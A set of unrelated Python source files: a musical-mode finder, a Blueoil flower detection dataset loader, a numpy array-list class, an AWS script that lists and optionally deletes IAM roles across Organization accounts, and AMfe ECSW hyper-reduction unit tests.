    *nota* may be a bare root or carry a quality suffix; anything else
    raises ValueError.  Returns eight 'note+quality' strings.
    """
    # Locrian steps in semitones: 1/2 - 1 - 1 - 1/2 - 1 - 1 - 1
    cadencia = (1, 2, 2, 1, 2, 2, 2)
    tonos = ('dism', 'maj7', 'min7', 'min7', 'maj7', 'dom', 'min7', 'dism')
    abanico_notas = ('C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B')
    # Strip any supported quality suffix down to the root (the original only
    # handled maj7/min7 and raised on 'Csus').
    raiz = re.match(r'([A-G]#?)(?:maj7|min7|sus)?$', nota)
    if raiz is None:
        raise ValueError('unsupported note spelling: %r' % (nota,))
    base = abanico_notas.index(raiz.group(1))
    tono = [abanico_notas[base] + tonos[0]]
    for index, paso in enumerate(cadencia, 1):
        base = (base + paso) % len(abanico_notas)
        tono.append(abanico_notas[base] + tonos[index])
    return tono
def chequeo_tono(tono, notas_array):
    """Return 1 when every note in *notas_array* appears in the scale *tono*.

    A sharp note ('F#') matches any scale entry that starts with it.  A
    natural note ('F') only matches entries whose root is not sharpened,
    so 'F' does not falsely match 'F#maj7'.
    """
    # Initialize before the loop: the original left 'candidata' unbound for
    # an empty notas_array and crashed with NameError at the return.
    candidata = 0
    for value in notas_array:
        candidata = 0
        if '#' in value:
            for nota in tono:
                if nota.startswith(value):
                    candidata = 1
                    break
        else:
            for nota in tono:
                if nota.startswith(value) and '#' not in nota:
                    candidata = 1
                    break
        if not candidata:
            break
    return candidata
def main():
    """Read notes from stdin and print every mode/key that contains them all.

    For each entered note, each of the seven diatonic modes rooted on it is
    generated and kept when every entered note belongs to that scale.
    """
    notas_input = raw_input("Inserta las notas separadas por espacio: ")
    # drop the empty tokens produced by repeated spaces
    notas_array = [n for n in notas_input.split(' ') if n != '']
    # (mode function, human-readable label), in degree order I..VII; replaces
    # seven copy-pasted check blocks from the original.
    modos = (
        (modo_jonico, 'Jonico I (maj7)'),
        (modo_dorico, 'Dorico II (min7)'),
        (modo_frigio, 'Frigio III (min7)'),
        (modo_lidio, 'Lidio IV (maj7)'),
        (modo_mixolidio, 'Mixolidio V (dom)'),
        (modo_eolico, 'Eolico VI (min7)'),
        (modo_locria, 'Locria VII (dism)'),
    )
    posibles_tonos = []
    for nota in notas_array:
        for funcion, etiqueta in modos:
            tono = funcion(nota)
            if chequeo_tono(tono, notas_array):
                posibles_tonos.append({'modo': etiqueta, 'escala': [tono]})
    # parenthesized single-argument print works under Python 2 and 3 alike
    if posibles_tonos:
        print('\nPosibles tonalidades:')
        for candidato in posibles_tonos:
            print(' # Tonalidad %s' % (candidato['modo'],))
            print('   Escala %s' % (candidato['escala'],))
    else:
        print('\nNo se han encontrado posibles tonos')
#for line in sys.stdin:
# print line
##############
#Main Program
##############
if __name__ == "__main__":
    # Parenthesized single-argument print is valid under both Python 2 and 3
    # (the original's statement form was Python-2-only).
    print('\n## Script started\n')
    main()
    print('\n## Script finished\n')
# -*- coding: utf-8 -*-
# Copyright 2018 The Blueoil Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import functools
import json
import os.path
import numpy as np
import PIL.Image
import pandas as pd
from lmnet.datasets.base import ObjectDetectionBase
from lmnet.utils.random import shuffle, train_test_split
class LmFlower(ObjectDetectionBase):
    """Leapmind flower dataset for object detection.

    images: images numpy array. shape is [batch_size, height, width]
    labels: gt_boxes numpy array. shape is [batch_size, num_max_boxes, 5(x, y, w, h, class_id)]
    """
    classes = ["sunflower", "calla", "poppy (Iceland poppy)", "carnation", "cosmos"]
    num_classes = len(classes)
    available_subsets = ["train", "validation"]
    extend_dir = "lm_flower"

    @classmethod
    def count_max_boxes(cls):
        """Count max boxes size over all subsets."""
        num_max_boxes = 0
        for subset in cls.available_subsets:
            obj = cls(subset=subset)
            gt_boxes_list = obj.annotations
            subset_max = max(len(gt_boxes) for gt_boxes in gt_boxes_list)
            num_max_boxes = max(num_max_boxes, subset_max)
        return num_max_boxes

    def __init__(
            self,
            *args,
            **kwargs
    ):
        super().__init__(
            *args,
            **kwargs,
        )
        # annotation file produced by the labeling tool; name fixed per dataset
        self.json = os.path.join(self.data_dir, "project_126_1507252774.json")
        self.images_dir = os.path.join(self.data_dir, "images")
        self._init_files_and_annotations()

    @property
    def num_per_epoch(self):
        """Number of samples in the current subset."""
        return len(self.files)

    def _element(self):
        """Return an image, gt_boxes."""
        index = self.current_element_index
        self.current_element_index += 1
        # wrap around at the end of the epoch and reshuffle
        if self.current_element_index == self.num_per_epoch:
            self.current_element_index = 0
            self._shuffle()
        files, gt_boxes_list = self.files, self.annotations
        target_file = files[index]
        gt_boxes = gt_boxes_list[index]
        gt_boxes = np.array(gt_boxes)
        # images are loaded lazily per element to keep memory bounded
        image = PIL.Image.open(target_file)
        image = np.array(image)
        samples = {'image': image, 'gt_boxes': gt_boxes}
        if callable(self.augmentor) and self.subset == "train":
            samples = self.augmentor(**samples)
        if callable(self.pre_processor):
            samples = self.pre_processor(**samples)
        image = samples['image']
        gt_boxes = samples['gt_boxes']
        return image, gt_boxes

    def _files_and_annotations_from_json(self, json_file):
        """Return files and gt_boxes list."""
        image_ids = self._image_ids(json_file)
        image_files = [self._image_file_from_image_id(json_file, image_id) for image_id in image_ids]
        gt_boxes_list = [self._gt_boxes_from_image_id(json_file, image_id) for image_id in image_ids]
        return image_files, gt_boxes_list

    def _image_file_from_image_id(self, json_file, image_id):
        """Resolve the image file path for *image_id*."""
        images = self._images_from_json(json_file)
        file_name = images[images.id == image_id].file_name.tolist()[0]
        return os.path.join(self.images_dir, file_name)

    def _gt_boxes_from_image_id(self, json_file, image_id):
        """Build the [x, y, w, h, class_id] box list for one image."""
        annotations = self._annotations_from_json(json_file)
        category_ids = annotations[annotations.image_id == image_id].category_id.tolist()
        categories = self._categories_from_json(json_file)
        category_names = [
            categories[categories.id == category_id].name.iloc[0]
            for category_id in category_ids
        ]
        labels = [self.classes.index(category) for category in category_names]
        bboxes = annotations[annotations.image_id == image_id].bbox.tolist()
        gt_boxes = []
        for class_id, bbox in zip(labels, bboxes):
            # ignore width 0 or height 0 box.
            if bbox[2] == 0 or bbox[3] == 0:
                continue
            gt_boxes.append(bbox + [class_id])
        return gt_boxes

    @functools.lru_cache(maxsize=None)
    def _load_json(self, json_file):
        """Load and cache the annotation JSON.

        NOTE(review): lru_cache on an instance method keeps self alive for
        the cache's lifetime; acceptable here as datasets are long-lived.
        """
        # Context manager closes the handle even when json.load() raises
        # (the original open/close pair leaked the descriptor on error).
        with open(json_file) as f:
            return json.load(f)

    def _image_ids(self, json_file):
        """All image ids present in the annotation file."""
        images = self._images_from_json(json_file)
        return images.id.tolist()

    @functools.lru_cache(maxsize=None)
    def _annotations_from_json(self, json_file):
        """Annotations table as a DataFrame (cached)."""
        data = self._load_json(json_file)
        annotations = pd.DataFrame(data["annotations"])
        return annotations

    @functools.lru_cache(maxsize=None)
    def _categories_from_json(self, json_file):
        """Categories table as a DataFrame (cached)."""
        data = self._load_json(json_file)
        categories = pd.DataFrame(data["categories"])
        return categories

    @functools.lru_cache(maxsize=None)
    def _images_from_json(self, json_file):
        """Images table as a DataFrame (cached)."""
        data = self._load_json(json_file)
        images = pd.DataFrame(data["images"])
        return images

    @functools.lru_cache(maxsize=None)
    def _files_and_annotations(self):
        """Return all files and labels list."""
        single_split_rate = 0.1
        files, labels = self._files_and_annotations_from_json(self.json)
        # deterministic 90/10 split; the fixed seed keeps train/validation
        # disjoint across instances
        train_files, test_files, train_labels, test_labels = \
            train_test_split(files,
                             labels,
                             test_size=single_split_rate,
                             seed=1)
        if self.subset == "train":
            files = train_files
            labels = train_labels
        else:
            files = test_files
            labels = test_labels
        print("files and annotations are ready")
        return files, labels

    @property
    @functools.lru_cache(maxsize=None)
    def num_max_boxes(self):
        """Max number of boxes in any single image, over all subsets."""
        return type(self).count_max_boxes()

    def feed(self):
        """Batch size numpy array of images and ground truth boxes.

        Returns:
            images: images numpy array. shape is [batch_size, height, width]
            gt_boxes_list: gt_boxes numpy array. shape is [batch_size, num_max_boxes, 5(x, y, w, h, class_id)]
        """
        images, gt_boxes_list = zip(*[self._element() for _ in range(self.batch_size)])
        images = np.array(images)
        gt_boxes_list = self._change_gt_boxes_shape(gt_boxes_list)
        return images, gt_boxes_list

    def _shuffle(self):
        """Shuffle data if train."""
        if self.subset == "train":
            self.files, self.annotations = shuffle(
                self.files, self.annotations, seed=self.seed)
            print("Shuffle {} train dataset with random state {}.".format(self.__class__.__name__, self.seed))
            # advance the seed so each epoch gets a different permutation
            self.seed += 1

    def _init_files_and_annotations(self):
        """Populate self.files / self.annotations for the chosen subset."""
        self.files, self.annotations = self._files_and_annotations()
        self._shuffle()
|
<reponame>vi-robotics/framegraph<gh_stars>0
from typing import Tuple, List, Union
from numbers import Number
import numpy as np
class NpArrayList():
    """A wrapper around an ndarray giving one axis (``extend_axis``) a
    constant-time amortized append operation, list-style.

    The underlying ("backed") array is over-allocated along extend_axis and
    doubled whenever it fills up; the publicly visible ("virtual") data is a
    slice of it.  The extend axis can be changed via the ``extend_axis``
    setter (this copies the data).
    """

    def __init__(self, data: np.ndarray, extend_axis: int = 0):
        """Initialize a NpArrayList with existing data.

        Args:
            data (np.ndarray): An ndarray to assign to 'data'.
            extend_axis (int, optional): The axis of the ndarray along which
                constant time append will be provided. Defaults to 0.
        """
        self._extend_axis = extend_axis
        self.data = data
        self._virtual_axis_len = data.shape[extend_axis]

    @property
    def extend_axis(self) -> int:
        """The axis of the ndarray which supports constant time append."""
        return self._extend_axis

    @extend_axis.setter
    def extend_axis(self, axis: int):
        """Set the extend axis of the array (copies the data).

        Args:
            axis (int): The extend axis of the array.
        """
        if axis >= self._data.ndim:
            raise ValueError(f"axis {axis} is not valid for data of shape"
                             f" {self.shape}")
        self._extend_axis = axis
        self._reset_data()

    @property
    def shape(self) -> Tuple[int, ...]:
        """The virtual shape of the data (the backed array is likely larger
        along extend_axis)."""
        res: List[int] = list(self._backed_shape)
        res[self.extend_axis] = self._virtual_axis_len
        return tuple(res)

    @property
    def size(self) -> int:
        """The virtual number of elements, as a plain Python int."""
        # int() so callers get an int, not a numpy scalar (np.prod returns one)
        return int(np.prod(self.shape))

    @property
    def data(self) -> np.ndarray:
        """The virtual data of the array (a view into the backed array)."""
        idx = [np.s_[:] for _ in self.shape]
        idx[self.extend_axis] = np.s_[:self._virtual_axis_len]
        return self._data[tuple(idx)]

    @data.setter
    def data(self, value: np.ndarray):
        """Set the virtual data of the array.

        Args:
            value (np.ndarray): The ndarray to set. The extend axis must be less
                than the number of dimensions of the array.

        Raises:
            ValueError: Incompatible extend axis for array shape.
            ValueError: Value is not an ndarray.
        """
        if not isinstance(value, np.ndarray):
            raise ValueError(f"value must be a ndarray, not {type(value)}")
        if value.ndim <= self.extend_axis:
            raise ValueError(f"extend_axis {self.extend_axis} is"
                             f" incompatible with shape {value.shape}")
        self._virtual_axis_len = value.shape[self.extend_axis]
        self._data: np.ndarray = value

    def append(self, value: Union[Number, np.ndarray]):
        """Append the value to the end of the array (along the extend_axis).

        Args:
            value (Union[Number, np.ndarray]): The value must have the same
                shape along every axis as data except extend_axis.
        """
        if self._virtual_axis_len == self._backed_shape[self.extend_axis]:
            self._grow_array()
        self._data[self._get_current_idx()] = value
        self._virtual_axis_len += 1

    def _reset_data(self):
        """Reset the data such that the virtual data is the same as the backed
        data.  The copy drops the over-allocation and avoids holding a view.
        """
        self.data = self.data.copy()

    def _get_current_idx(self) -> Tuple[Union[int, slice], ...]:
        """Get the index tuple for the current 'append' slice of the array."""
        idx: List[Union[int, slice]] = [np.s_[:] for _ in self.shape]
        idx[self.extend_axis] = self._virtual_axis_len
        return tuple(idx)

    def _grow_array(self):
        """Double the backed array along extend_axis."""
        new_shape = list(self._backed_shape)
        # max(1, ...) lets an array that starts empty along extend_axis grow:
        # the original doubled 0 to 0 forever, so the first append raised an
        # IndexError instead of making room.
        new_shape[self.extend_axis] = max(1, new_shape[self.extend_axis] * 2)
        # NOTE(review): resize requires _data to own its memory; wrappers
        # produced by __getitem__ hold views and cannot be appended to.
        self._data.resize(new_shape, refcheck=False)

    @property
    def _backed_shape(self):
        # shape of the (possibly over-allocated) underlying array
        return self._data.shape

    def __str__(self):
        return self.data.__str__()  # pragma: no cover

    def __getitem__(self, val):
        res_obj = self.data.__getitem__(val)
        # Scalar results (or results with too few dims to host extend_axis)
        # cannot be wrapped; return them as-is instead of raising like the
        # original did for plain element access.
        if not isinstance(res_obj, np.ndarray) or res_obj.ndim <= self.extend_axis:
            return res_obj
        return self.__class__(res_obj, extend_axis=self.extend_axis)
|
#!/usr/bin/env python3
"""
Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import os, sys, pprint
from typing import List, Any
import Inventory_Modules, boto3
import argparse
from colorama import init, Fore, Back, Style
from botocore.exceptions import ClientError, NoCredentialsError, EndpointConnectionError
from urllib3.exceptions import NewConnectionError
import logging
init()
# Command-line interface.  prefix_chars includes '+' so the destructive
# option (+d = delete) is visually distinct from the read-only -d (debug).
parser = argparse.ArgumentParser(
    prefix_chars='-+/',
    description="We're going to find all resources within any of the profiles we have access to.")
parser.add_argument(
    "-p", "--profile",
    dest="pProfile",
    metavar="profile to use",
    help="You need to specify a profile that represents the ROOT account.")
parser.add_argument(
    "-r", "--role",
    dest="pRole",
    metavar="specific role to find",
    default="",
    help="Please specify the role you're searching for")
parser.add_argument(
    "+d", "--delete",
    dest="pDelete",
    action="store_const",
    const=True,
    default=False,
    help="Whether you'd like to delete that specified role.")
# Verbosity ladder: each extra -v lowers the logging threshold.
parser.add_argument(
    '-v',
    help="Be verbose",
    action="store_const",
    dest="loglevel",
    const=logging.ERROR,  # args.loglevel = 40
    default=logging.CRITICAL)  # args.loglevel = 50
parser.add_argument(
    '-vv', '--verbose',
    help="Be MORE verbose",
    action="store_const",
    dest="loglevel",
    const=logging.WARNING,  # args.loglevel = 30
    default=logging.CRITICAL)  # args.loglevel = 50
parser.add_argument(
    '-vvv',
    help="Print debugging statements",
    action="store_const",
    dest="loglevel",
    const=logging.INFO,  # args.loglevel = 20
    default=logging.CRITICAL)  # args.loglevel = 50
parser.add_argument(
    '-d', '--debug',
    help="Print LOTS of debugging statements",
    action="store_const",
    dest="loglevel",
    const=logging.DEBUG,  # args.loglevel = 10
    default=logging.CRITICAL)  # args.loglevel = 50
args = parser.parse_args()

pProfile = args.pProfile
pRole = args.pRole
pDelete = args.pDelete
# NOTE: the adjacent string literals '%(' '' 'message)s' concatenate to the
# ordinary '%(message)s' placeholder.
logging.basicConfig(level=args.loglevel,
                    format="[%(filename)s:%(lineno)s:%(levelname)s - %(funcName)20s() ] %(""message)s")
##########################
ERASE_LINE = '\x1b[2K'  # ANSI escape: clear the current terminal line
##########################
def delete_role(fRoleList):
    """Detach managed policies, delete inline policies, then delete an IAM role.

    IAM refuses to delete a role that still has attached or inline policies,
    so both are removed first.

    Parameters:
        fRoleList (dict): one role record holding the temporary credentials for
            the owning account ('aws_access_key_id', 'aws_secret_access_key',
            'aws_session_token') plus the 'RoleName' to delete.

    Returns:
        bool: True when the role was fully deleted, False on any IAM API error.
    """
    iam_session = boto3.Session(
        aws_access_key_id=fRoleList['aws_access_key_id'],
        aws_secret_access_key=fRoleList['aws_secret_access_key'],
        aws_session_token=fRoleList['aws_session_token'],
        region_name='us-east-1')
    iam_client = iam_session.client('iam')
    try:
        # Detach all managed policies first.
        attached_policies = iam_client.list_attached_role_policies(
            RoleName=fRoleList['RoleName']
        )['AttachedPolicies']
        for policy in attached_policies:
            iam_client.detach_role_policy(
                RoleName=fRoleList['RoleName'],
                PolicyArn=policy['PolicyArn']
            )
        # BUG FIX: list_role_policies returns 'PolicyNames' as a list of plain
        # strings, not dicts; the old code's inline_role_policies[i]['PolicyName']
        # raised TypeError whenever an inline policy existed.
        inline_policy_names = iam_client.list_role_policies(
            RoleName=fRoleList['RoleName']
        )['PolicyNames']
        for policy_name in inline_policy_names:
            iam_client.delete_role_policy(
                RoleName=fRoleList['RoleName'],
                PolicyName=policy_name
            )
        iam_client.delete_role(
            RoleName=fRoleList['RoleName']
        )
        return True
    except ClientError as my_Error:
        print(my_Error)
        return False
# ---------------------------------------------------------------------------
# Main body: enumerate IAM roles in every child account of the Organization,
# optionally deleting the one named by --role when +d was given.
# ---------------------------------------------------------------------------
ChildAccounts = Inventory_Modules.find_child_accounts2(pProfile)
print()
if not (pRole == ""):
    print("Looking for a specific role called {}".format(pRole))
    print()
fmt = '%-15s %-42s'
print(fmt % ("Account Number", "Role Name"))
print(fmt % ("--------------", "---------"))
Roles = []              # accumulated role records across all accounts
SpecifiedRoleNum = 0    # how many times the requested role was found
DeletedRoles = 0        # how many times the requested role was deleted
for account in ChildAccounts:
    try:
        RoleNum = 0
        account_credentials, role_arn = Inventory_Modules.get_child_access2(pProfile, account['AccountId'])
        if role_arn.find("failed") > 0:
            logging.error("Access to member account %s failed...", account['AccountId'])
            continue
        account_credentials['AccountId'] = account['AccountId']
        logging.info("Connecting to %s with %s role", account['AccountId'], role_arn)
        logging.info("Role ARN: %s", role_arn)
        print(ERASE_LINE, "Checking Account {}".format(account_credentials['AccountId']), end="")
    except ClientError as my_Error:
        if str(my_Error).find("AuthFailure") > 0:
            print("{}: Authorization Failure for account {}".format(pProfile, account['AccountId']))
        # BUG FIX: previously only the AuthFailure case skipped the account;
        # any other ClientError fell through to the code below with
        # account_credentials possibly unbound, raising NameError.
        continue
    iam_session = boto3.Session(
        aws_access_key_id=account_credentials['AccessKeyId'],
        aws_secret_access_key=account_credentials['SecretAccessKey'],
        aws_session_token=account_credentials['SessionToken'],
        region_name='us-east-1')
    iam_client = iam_session.client('iam')
    try:
        response = iam_client.list_roles()
        for role in response['Roles']:
            Roles.append({
                'aws_access_key_id': account_credentials['AccessKeyId'],
                'aws_secret_access_key': account_credentials['SecretAccessKey'],
                'aws_session_token': account_credentials['SessionToken'],
                'AccountId': account_credentials['AccountId'],
                'RoleName': role['RoleName']
            })
        RoleNum = len(response['Roles'])
        while response['IsTruncated']:
            response = iam_client.list_roles(Marker=response['Marker'])
            for role in response['Roles']:
                # BUG FIX: paginated pages previously appended records without
                # the credential keys, so delete_role() raised KeyError for any
                # role beyond the first page of results.
                Roles.append({
                    'aws_access_key_id': account_credentials['AccessKeyId'],
                    'aws_secret_access_key': account_credentials['SecretAccessKey'],
                    'aws_session_token': account_credentials['SessionToken'],
                    'AccountId': account_credentials['AccountId'],
                    'RoleName': role['RoleName']
                })
            RoleNum += len(response['Roles'])
        print(" - Found {} roles".format(RoleNum), end="\r")
    except ClientError as my_Error:
        if str(my_Error).find("AuthFailure") > 0:
            print(pProfile + ": Authorization Failure for account {}".format(account['AccountId']))
        RoleNum = 0
# BUG FIX: RoleNum still holds the last account's per-account count here;
# reset it so the grand total below isn't inflated.
RoleNum = 0
if (pRole == ""):
    # No specific role requested: list everything found.
    for role_record in Roles:
        print(fmt % (role_record['AccountId'], role_record['RoleName']))
        RoleNum += 1
elif not (pRole == ""):
    # A specific role was requested: report (and optionally delete) matches.
    for role_record in Roles:
        RoleNum += 1
        if role_record['RoleName'] == pRole:
            print(fmt % (role_record['AccountId'], role_record['RoleName']), end="")
            SpecifiedRoleNum += 1
            if pDelete:
                delete_role(role_record)
                print(" - deleted", end="")
                DeletedRoles += 1
            print()
print()
if (pRole == ""):
    print("Found {} roles across {} accounts".format(RoleNum, len(ChildAccounts)))
else:
    print("Found {} in {} of {} accounts".format(pRole, SpecifiedRoleNum, len(ChildAccounts)))
    if pDelete:
        print(" And we deleted it {} times".format(DeletedRoles))
print()
print("Thanks for using this script...")
print()
|
<reponame>ma-kast/AMfe
# Copyright (c) 2018, Lehrstuhl für Angewandte Mechanik, Technische Universität München.
#
# Distributed under BSD-3-Clause License. See LICENSE-File for more information
#
#
from unittest import TestCase
import numpy as np
from numpy.testing import assert_, assert_allclose, assert_array_equal
from numpy.linalg import norm
from amfe.mor.hyper_red.ecsw import sparse_nnls, ecsw_assemble_G_and_b, ecsw_get_weights_by_component
from amfe.mor.ui import create_ecsw_hyperreduced_component_from_weights
from amfe.io.tools import amfe_dir
from amfe.io.mesh.reader import GidJsonMeshReader
from amfe.io.mesh.writer import AmfeMeshConverter
from amfe.mor.hyper_red.ecsw_assembly import EcswAssembly
from amfe.assembly import StructuralAssembly
from amfe.component import StructuralComponent
from amfe.material import KirchhoffMaterial
class TestNnls(TestCase):
    """Tests for the sparse non-negative least-squares solver `sparse_nnls`."""

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def test_nnls(self):
        # Copyright Notice:
        # The Nnls testcase is a modified version of the nnls test case of the Scipy-package.
        # This was distributed under BSD-3 License
        # Copyright(c) 2001, 2002 Enthought, Inc.
        # All rights reserved.
        #
        # Copyright (c) 2003-2019 SciPy Developers.
        # All rights reserved.
        #
        # Author: <NAME>
        # Sep 2008
        #
        # Build a matrix a
        a = np.arange(25.0).reshape(-1, 5)
        # Build a vector x
        x = np.arange(5.0)
        # Calculate the correct right hand side
        y = np.dot(a, x)
        # Calculate tau from residual tolerance tol = tau * norm(y)
        tol = 1e-7
        tau = tol/norm(y)
        # run algorithm
        x, stats = sparse_nnls(a, y, tau)
        # get last residual before return
        res = stats[-1][1]
        # test if residual is smaller than desired tolerance
        assert_(res <= tol)
        assert_(norm(np.dot(a, x.toarray()).reshape(-1)-y) <= 1e-7)
        # test if all x are greater equal zero
        # BUG FIX: the result of np.all(...) was previously discarded, so the
        # non-negativity property was never actually asserted.
        assert_(np.all(np.greater_equal(x.toarray(), 0.0)))
        # make a second test that does not converge
        a = np.array([[0.21235441, 0.32701625, 0.67680346, 0.72724123, 0.51983536],
                      [0.82603172, 0.76654767, 0.69746447, 0.58220156, 0.2564705 ],
                      [0.04594648, 0.78409449, 0.85036132, 0.4888821 , 0.92390904],
                      [0.10404788, 0.37767343, 0.30689839, 0.77633873, 0.42464905],
                      [0.66897911, 0.59824198, 0.60212744, 0.02402656, 0.75641132]])
        y = np.array([0., 0., 0., 0., 0.19731525])
        tau = 1e-1/norm(y)
        # this should not converge; test if RuntimeError is raised
        with self.assertRaises(RuntimeError):
            sparse_nnls(a, y, tau)
class TestEcsw(TestCase):
    """Integration tests for ECSW hyper-reduction on a small tet mesh.

    Builds a StructuralComponent from a 4-tet GiD mesh, generates random
    snapshots, and checks G/b assembly plus the reduction entry points.
    """

    def setUp(self):
        # Define input file path
        file = amfe_dir('tests/meshes/gid_json_4_tets.json')
        # Define Reader Object, initialized with AmfeMeshConverter
        reader = GidJsonMeshReader(file)
        # Initialize component
        converter = AmfeMeshConverter()
        reader.parse(converter)
        self.my_mesh = converter.return_mesh()
        self.my_component = StructuralComponent(self.my_mesh)
        my_material = KirchhoffMaterial()
        self.my_component.assign_material(my_material, ['left', 'right'], 'S')
        # Get number of dofs for snapshot generation
        self.no_of_dofs = self.my_component.mapping.no_of_dofs
        # create 2 random snapshots
        # NOTE(review): the RNG is unseeded, so fixtures differ between runs;
        # the assertions below are self-consistent, but consider seeding.
        self.no_of_snapshots = 2
        self.S = np.random.rand(self.no_of_dofs, self.no_of_snapshots) * 0.05
        self.W = np.eye(self.no_of_dofs)
        self.timesteps = np.zeros(self.no_of_snapshots)

    def tearDown(self):
        pass

    def test_assemble_g_b(self):
        """Check G column-wise against hand-assembled element forces."""
        # store an example for f_int for later comparison to check if the old assembly is recovered
        # after ecsw_assemble_G_and_b has finished
        no_of_dofs = self.S.shape[0]
        # dq/ddq: zero velocity/acceleration snapshots for the static check
        dq = ddq = np.zeros(no_of_dofs)
        t = 0.0
        f_old = self.my_component.f_int(self.S[:, 0], dq, t)
        # run ecsw_assemble_G_and_b
        G, b = ecsw_assemble_G_and_b(self.my_component, self.S, self.W, self.timesteps)
        # test shape of G and b
        no_of_elements = self.my_component.no_of_elements
        self.assertEqual(G.shape, (self.no_of_dofs*self.no_of_snapshots, no_of_elements))
        # ----------------------------------
        # Check if G is correct
        # Test first entry of G: column 0 (element 1), rows of snapshot 0
        g11_actual = G[0:self.no_of_dofs, 0]
        connectivity = self.my_mesh.get_connectivity_by_elementids([1])[0]
        X_local = self.my_mesh.nodes_df.loc[connectivity].values.reshape(-1)
        u_local_indices = self.my_component.mapping.nodal2global.loc[connectivity].values.reshape(-1)
        u_local = self.S[u_local_indices, 0]
        fe_local = self.my_component.ele_obj[0].f_int(X_local, u_local)
        global_dofs = self.my_component.mapping.elements2global[0]
        g11_desired = np.zeros(self.no_of_dofs)
        g11_desired[global_dofs] = fe_local
        assert_allclose(g11_actual, g11_desired)
        # Test second entry of G: column 0 (element 1), rows of snapshot 1
        g21_actual = G[self.no_of_dofs:, 0]
        connectivity = self.my_mesh.get_connectivity_by_elementids([1])[0]
        X_local = self.my_mesh.nodes_df.loc[connectivity].values.reshape(-1)
        u_local_indices = self.my_component.mapping.nodal2global.loc[connectivity].values.reshape(-1)
        u_local = self.S[u_local_indices, 1]
        fe_local = self.my_component.ele_obj[0].f_int(X_local, u_local)
        global_dofs = self.my_component.mapping.elements2global[0]
        g21_desired = np.zeros(self.no_of_dofs)
        g21_desired[global_dofs] = fe_local
        assert_allclose(g21_actual, g21_desired)
        # Test third entry of G: column 1 (element 2), rows of snapshot 0
        g12_actual = G[0:self.no_of_dofs, 1]
        connectivity = self.my_mesh.get_connectivity_by_elementids([2])[0]
        X_local = self.my_mesh.nodes_df.loc[connectivity].values.reshape(-1)
        u_local_indices = self.my_component.mapping.nodal2global.loc[connectivity].values.reshape(-1)
        u_local = self.S[u_local_indices, 0]
        fe_local = self.my_component.ele_obj[1].f_int(X_local, u_local)
        global_dofs = self.my_component.mapping.elements2global[1]
        g12_desired = np.zeros(self.no_of_dofs)
        g12_desired[global_dofs] = fe_local
        assert_allclose(g12_actual, g12_desired)
        # --------------------------------------
        # check if b is correct: b is the row-sum of G by construction
        b_desired = np.sum(G, 1)
        assert_allclose(b, b_desired)
        # --------------------------------------
        # Check if old assembly is recovered
        # get f_new for comparison to f_old
        f_new = self.my_component.f_int(self.S[:, 0], dq, t)
        # test if old assembly is recovered in the component
        assert_allclose(f_new, f_old)

    def test_reduce_with_ecsw(self):
        """Exercise all copymodes of the ECSW reduction factory."""
        # store old ids to distinguish deep/shallow/overwrite semantics:
        comp_id_old = id(self.my_component)
        mesh_id_old = id(self.my_component.mesh)
        # first mode: deepcopy — new component AND new mesh
        weights, indices, stats = ecsw_get_weights_by_component(self.my_component, self.S, self.W,
                                                               self.timesteps, tau=0.01)
        ecsw_component = create_ecsw_hyperreduced_component_from_weights(self.my_component, weights, indices,
                                                                         copymode='deep')
        self.assertNotEqual(id(ecsw_component), comp_id_old)
        self.assertNotEqual(id(ecsw_component.mesh), mesh_id_old)
        self.assertIsInstance(ecsw_component.assembly, EcswAssembly)
        # second mode: shallow — new component, shared mesh
        weights, indices, stats = ecsw_get_weights_by_component(self.my_component, self.S, self.W,
                                                               self.timesteps, tau=0.01)
        ecsw_component = create_ecsw_hyperreduced_component_from_weights(self.my_component, weights, indices,
                                                                         copymode='shallow')
        self.assertNotEqual(id(ecsw_component), comp_id_old)
        self.assertEqual(id(ecsw_component.mesh), mesh_id_old)
        self.assertIsInstance(ecsw_component.assembly, EcswAssembly)
        # third mode: overwrite — same component object, same mesh
        weights, indices, stats = ecsw_get_weights_by_component(self.my_component, self.S, self.W,
                                                               self.timesteps, tau=0.01)
        ecsw_component = create_ecsw_hyperreduced_component_from_weights(self.my_component, weights, indices,
                                                                         copymode='overwrite')
        self.assertEqual(id(ecsw_component), comp_id_old)
        self.assertEqual(id(ecsw_component.mesh), mesh_id_old)
        self.assertIsInstance(ecsw_component.assembly, EcswAssembly)
        # test wrong copymode raises ValueError
        with self.assertRaises(ValueError):
            weights, indices, stats = ecsw_get_weights_by_component(self.my_component, self.S, self.W,
                                                                    self.timesteps, tau=0.01, conv_stats=False)
            ecsw_component = create_ecsw_hyperreduced_component_from_weights(self.my_component, weights, indices,
                                                                             copymode='foo')
        # test if function with option stats = false is executable
        weights, indices, stats = ecsw_get_weights_by_component(self.my_component, self.S, self.W,
                                                                self.timesteps, tau=0.01, conv_stats=False)
        ecsw_component = create_ecsw_hyperreduced_component_from_weights(self.my_component, weights, indices)
        self.assertIsInstance(ecsw_component.assembly, EcswAssembly)
class EcswTest(TestCase):
    """Unit tests for EcswAssembly using a dummy element with fixed matrices.

    Only the weighted subset of elements selected by `indices` must be
    assembled; untouched rows stay zero.
    """

    def setUp(self):
